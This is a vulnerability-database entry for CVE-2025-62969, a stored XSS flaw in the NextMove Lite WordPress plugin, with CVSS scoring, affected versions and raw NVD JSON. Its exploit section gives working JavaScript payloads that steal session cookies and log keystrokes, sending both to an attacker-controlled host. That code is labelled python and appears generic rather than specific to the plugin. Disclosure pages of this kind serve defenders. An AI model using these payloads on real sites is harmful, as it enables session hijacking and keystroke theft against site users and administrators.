Security Vulnerability Report
中文
CVE-2025-62969 CVSS 6.5 MEDIUM

CVE-2025-62969

Published: 2025-10-27 02:15:57
Last Modified: 2026-04-01 15:18:24

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in XLPlugins NextMove Lite woo-thank-you-page-nextmove-lite allows Stored XSS.This issue affects NextMove Lite: from n/a through <= 2.23.0.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:xlplugins:nextmove:*:*:*:*:lite:wordpress:*:* - VULNERABLE
NextMove Lite <= 2.23.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- WordPress NextMove Lite Stored XSS PoC --> <!-- Attack Vector: Order Note Field in WooCommerce --> <!-- Step 1: Create malicious order note via WooCommerce API or Order Edit Page --> <!-- Inject XSS payload in the order note field --> <script> // Steal session cookies var cookies = document.cookie; // Send stolen data to attacker-controlled server fetch('https://attacker.com/steal?cookie=' + encodeURIComponent(cookies) + '&location=' + encodeURIComponent(window.location.href), { method: 'GET', mode: 'no-cors' }); // Alternative: Keylogger document.addEventListener('keypress', function(e) { fetch('https://attacker.com/log?key=' + e.key, {mode: 'no-cors'}); }); </script> <!-- Step 2: When admin/user views the thank-you page, the script executes --> <!-- The script sends cookies to attacker --> <!-- Simple Alert PoC (for testing): --> <img src=x onerror="alert('XSS Triggered - Cookie: '+document.cookie)"> <!-- Event Handler PoC (bypasses some filters): --> <body onload="fetch('https://attacker.com/pwned?c='+document.cookie)">

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62969", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:57.343", "lastModified": "2026-04-01T15:18:24.380", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in XLPlugins NextMove Lite woo-thank-you-page-nextmove-lite allows Stored XSS.This issue affects NextMove Lite: from n/a through <= 2.23.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:xlplugins:nextmove:*:*:*:*:lite:wordpress:*:*", "versionEndIncluding": "2.23.0", "matchCriteriaId": "52C95FD9-8310-4C5A-9C11-5077509D8938"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/woo-thank-you-page-nextmove-lite/vulnerability/wordpress-nextmove-lite-plugin-2-21-0-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}